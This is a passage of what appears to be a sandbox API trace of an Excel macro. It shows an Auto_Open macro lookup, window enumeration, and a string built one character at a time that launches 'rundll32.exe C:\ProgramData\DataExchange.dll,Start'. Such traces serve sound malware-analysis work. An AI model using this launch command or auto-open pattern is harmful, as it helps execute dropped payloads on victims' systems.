out: lpWideCharStr="-") returned 1 [0212.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655428, cchWideChar=1 | out: lpWideCharStr="P") returned 1 [0212.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655348, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0212.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655388, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0212.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655408, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0212.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x26552a8, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0212.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655328, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0212.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x26552c8, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0212.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655188, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0212.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655268, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0212.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x26551c8, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0212.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655208, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0212.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655168, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0212.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655148, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0212.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x26550e8, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0212.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x26551e8, cchWideChar=1 | out: lpWideCharStr="3") returned 1 [0212.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655108, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0212.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x26550a8, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0212.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2657e28, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0212.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2657e48, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0212.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x26555c8, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0212.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655288, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0212.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x26553a8, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0212.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x26559e8, cchWideChar=1 | out: lpWideCharStr=":") returned 1 [0212.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x26558c8, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0212.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655768, cchWideChar=1 | out: lpWideCharStr="P") returned 1 [0212.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655b68, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0212.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2656d68, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0212.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2656ec8, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0212.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2656de8, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0212.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2656e08, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0212.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2656e28, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0212.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2656e48, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0212.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2656e68, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0212.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2656dc8, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0212.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2654648, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0212.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2656e88, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0212.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2657688, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0212.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2654628, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0212.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655f08, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0212.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2654608, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0212.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655ea8, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0212.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655ec8, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0212.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655e88, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0212.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655ee8, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0212.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655e08, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0212.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655e68, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0212.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655e48, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0212.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655de8, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0212.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655d68, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0212.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655e28, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0212.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655d88, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0212.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655da8, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0212.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655d28, cchWideChar=1 | out: lpWideCharStr=",") returned 1 [0212.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655dc8, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0212.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655ce8, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0212.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655d48, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0212.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655ca8, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0212.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655d08, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0212.332] malloc (_Size=0xa0) returned 0x48ab340 [0212.332] free (_Block=0x48ab340) [0212.332] malloc (_Size=0xa0) returned 0x48ab340 [0212.332] free (_Block=0x48ab340) [0212.332] malloc (_Size=0xa0) returned 0x48ab340 [0212.332] free (_Block=0x48ab340) [0212.332] malloc (_Size=0xa0) returned 0x48ab340 [0212.332] free (_Block=0x48ab340) [0212.463] GetAsyncKeyState (vKey=27) returned 0 [0212.463] FileSystemObject:IUnknown:Release (This=0x51c6d0) returned 0x0 [0212.483] FileSystemObject:IUnknown:Release (This=0x469080) returned 0x0 [0213.362] IMalloc:Free (This=0x7fefecb5380, pv=0xa222f50) [0213.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x115fdbf8, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0213.475] SysStringByteLen (bstr="䉖偁潲敪瑣") returned 0xa [0213.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x115fdbf8, cbMultiByte=11, lpWideCharStr=0x115f6e18, cchWideChar=11 | out: lpWideCharStr="VBAProject") returned 11 [0213.476] malloc (_Size=0x90) returned 0x11f50350 [0213.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[VBAProject].Auto_Open", cchWideChar=-1, lpMultiByteStr=0x1decc0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[VBAProject].Auto_Open", lpUsedDefaultChar=0x0) returned 23 [0213.477] IMalloc:Alloc (This=0x7fefecb5380, cb=0x18) returned 0x9653dd0 [0213.477] strncpy_s (in: _Dst=0x9653dd0, _DstSize=0x18, _Src="[VBAProject].Auto_Open", _MaxCount=0x16 | out: _Dst="[VBAProject].Auto_Open") returned 0x0 [0213.478] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="VBAProject") returned 0x10bfbe [0213.478] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x991dad0 [0213.478] qsort (in: _Base=0x991dad0, _NumOfElements=0x4, _SizeOfElements=0x8, _PtFuncCompare=0x7fee4e5219c | out: _Base=0x991dad0) [0213.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ThisWorkbook", cchCount1=-1, lpString2="Module1", cchCount2=-1) returned 3 [0213.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Sheet1", cchCount1=-1, lpString2="ThisWorkbook", cchCount2=-1) returned 1 [0213.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Sheet2", cchCount1=-1, lpString2="ThisWorkbook", cchCount2=-1) returned 1 [0213.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Sheet2", cchCount1=-1, lpString2="Module1", cchCount2=-1) returned 3 [0213.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Sheet1", cchCount1=-1, lpString2="Sheet2", cchCount2=-1) returned 1 [0213.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Sheet1", cchCount1=-1, lpString2="Module1", cchCount2=-1) returned 3 [0213.478] bsearch (_Key=0x1ddbd8, _Base=0x991dad0, _NumOfElements=0x4, _SizeOfElements=0x8, _PtFuncCompare=0x7fee4e5219c) returned 0x0 [0213.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="VBAProject", cchCount1=-1, lpString2="Sheet1", cchCount2=-1) returned 3 [0213.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="VBAProject", cchCount1=-1, lpString2="Sheet2", cchCount2=-1) returned 3 [0213.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="VBAProject", cchCount1=-1, lpString2="ThisWorkbook", cchCount2=-1) returned 3 [0213.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="VBAProject", cchCount1=-1, lpString2="VBAProject", cchCount2=-1) returned 2 [0213.478] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Auto_Open") returned 0x102056 [0213.478] bsearch (_Key=0x1ddbd8, _Base=0x991dad0, _NumOfElements=0x4, _SizeOfElements=0x8, _PtFuncCompare=0x7fee4e5219c) returned 0x0 [0213.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Auto_Open", cchCount1=-1, lpString2="Sheet1", cchCount2=-1) returned 1 [0213.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Auto_Open", cchCount1=-1, lpString2="Module1", cchCount2=-1) returned 1 [0213.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Auto_Open", cchCount1=-1, lpString2="VBAProject", cchCount2=-1) returned 1 [0213.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Auto_Open", cchCount1=-1, lpString2="VBA", cchCount2=-1) returned 1 [0213.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Auto_Open", cchCount1=-1, lpString2="Excel", cchCount2=-1) returned 1 [0213.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Auto_Open", cchCount1=-1, lpString2="stdole", cchCount2=-1) returned 1 [0213.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Auto_Open", cchCount1=-1, lpString2="Office", cchCount2=-1) returned 1 [0213.479] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Auto_Open") returned 0x102056 [0213.492] IMalloc:Free (This=0x7fefecb5380, pv=0x9653dd0) [0218.248] GetCurrentThreadId () returned 0xae8 [0218.248] GetWindowLongA (hWnd=0x0, nIndex=-16) returned 0 [0218.248] GetDesktopWindow () returned 0x10010 [0218.248] GetWindow (hWnd=0x10010, uCmd=0x5) returned 0x300b0 [0218.248] GetClassNameA (in: hWnd=0x300b0, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.248] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.248] GetWindowThreadProcessId (in: hWnd=0x300b0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.248] GetWindow (hWnd=0x300b0, uCmd=0x2) returned 0x300d6 [0218.248] GetClassNameA (in: hWnd=0x300d6, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.248] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.248] GetWindowThreadProcessId (in: hWnd=0x300d6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.248] GetWindow (hWnd=0x300d6, uCmd=0x2) returned 0x300c0 [0218.248] GetClassNameA (in: hWnd=0x300c0, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.248] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.248] GetWindowThreadProcessId (in: hWnd=0x300c0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.248] GetWindow (hWnd=0x300c0, uCmd=0x2) returned 0x1013c [0218.248] GetClassNameA (in: hWnd=0x1013c, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="ATL:000007FEF4C752C0") returned 20 [0218.248] lstrcmpA (lpString1="ATL:000007FEF4C752C0", lpString2="ThunderRT6Main") returned -1 [0218.248] GetWindowThreadProcessId (in: hWnd=0x1013c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x50c [0218.248] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10136 [0218.248] GetClassNameA (in: hWnd=0x10136, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.248] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.248] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5a4 [0218.248] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x10134 [0218.248] GetClassNameA (in: hWnd=0x10134, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="TaskSwitcherWnd") returned 15 [0218.248] lstrcmpA (lpString1="TaskSwitcherWnd", lpString2="ThunderRT6Main") returned -1 [0218.249] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5a4 [0218.249] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10076 [0218.249] GetClassNameA (in: hWnd=0x10076, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.249] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.249] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.249] GetWindow (hWnd=0x10076, uCmd=0x2) returned 0x10074 [0218.249] GetClassNameA (in: hWnd=0x10074, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.249] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.249] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.249] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x10060 [0218.249] GetClassNameA (in: hWnd=0x10060, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.249] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.249] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.249] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1008a [0218.249] GetClassNameA (in: hWnd=0x1008a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.249] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.249] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.249] GetWindow (hWnd=0x1008a, uCmd=0x2) returned 0x1007e [0218.249] GetClassNameA (in: hWnd=0x1007e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.249] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.249] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.249] GetWindow (hWnd=0x1007e, uCmd=0x2) returned 0x1007c [0218.249] GetClassNameA (in: hWnd=0x1007c, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.249] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.249] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.249] GetWindow (hWnd=0x1007c, uCmd=0x2) returned 0x10078 [0218.249] GetClassNameA (in: hWnd=0x10078, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.249] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.249] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.249] GetWindow (hWnd=0x10078, uCmd=0x2) returned 0x10056 [0218.249] GetClassNameA (in: hWnd=0x10056, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0218.249] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0218.250] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.250] GetWindow (hWnd=0x10056, uCmd=0x2) returned 0x1004e [0218.250] GetClassNameA (in: hWnd=0x1004e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.250] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.250] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.250] GetWindow (hWnd=0x1004e, uCmd=0x2) returned 0x10058 [0218.250] GetClassNameA (in: hWnd=0x10058, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="Button") returned 6 [0218.250] lstrcmpA (lpString1="Button", lpString2="ThunderRT6Main") returned -1 [0218.250] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.250] GetWindow (hWnd=0x10058, uCmd=0x2) returned 0x10050 [0218.250] GetClassNameA (in: hWnd=0x10050, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="Shell_TrayWnd") returned 13 [0218.250] lstrcmpA (lpString1="Shell_TrayWnd", lpString2="ThunderRT6Main") returned -1 [0218.250] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.250] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x100f6 [0218.250] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.250] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.250] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x45c [0218.250] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x5009a [0218.250] GetClassNameA (in: hWnd=0x5009a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.251] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.251] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.251] GetWindow (hWnd=0x5009a, uCmd=0x2) returned 0x1008c [0218.251] GetClassNameA (in: hWnd=0x1008c, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0218.251] lstrcmpA (lpString1="TaskListThumbnailWnd", lpString2="ThunderRT6Main") returned -1 [0218.251] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.251] GetWindow (hWnd=0x1008c, uCmd=0x2) returned 0x102ca [0218.251] GetClassNameA (in: hWnd=0x102ca, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0218.251] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0218.251] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.251] GetWindowLongA (hWnd=0x102ca, nIndex=-16) returned -1946157056 [0218.251] GetWindowLongPtrA (hWnd=0x102ca, nIndex=-6) returned 0x0 [0218.251] GetWindowLongPtrA (hWnd=0x102ca, nIndex=-6) returned 0x0 [0218.251] GetWindow (hWnd=0x102ca, uCmd=0x2) returned 0x20256 [0218.251] GetClassNameA (in: hWnd=0x20256, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.251] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.251] GetWindowThreadProcessId (in: hWnd=0x20256, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.251] GetWindowLongA (hWnd=0x20256, nIndex=-16) returned -1946157056 [0218.251] GetWindowLongPtrA (hWnd=0x20256, nIndex=-6) returned 0x13f7d0000 [0218.251] GetWindowLongPtrA (hWnd=0x20256, nIndex=-6) returned 0x13f7d0000 [0218.251] GetWindow (hWnd=0x20256, uCmd=0x2) returned 0x20292 [0218.252] GetClassNameA (in: hWnd=0x20292, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="XLMAIN") returned 6 [0218.252] lstrcmpA (lpString1="XLMAIN", lpString2="ThunderRT6Main") returned 1 [0218.252] GetWindowThreadProcessId (in: hWnd=0x20292, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.252] GetWindowLongA (hWnd=0x20292, nIndex=-16) returned 399441920 [0218.252] GetWindowLongPtrA (hWnd=0x20292, nIndex=-6) returned 0x13f7d0000 [0218.252] GetWindowLongPtrA (hWnd=0x20292, nIndex=-6) returned 0x13f7d0000 [0218.252] GetWindow (hWnd=0x20292, uCmd=0x2) returned 0x2037a [0218.252] GetClassNameA (in: hWnd=0x2037a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0218.252] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned 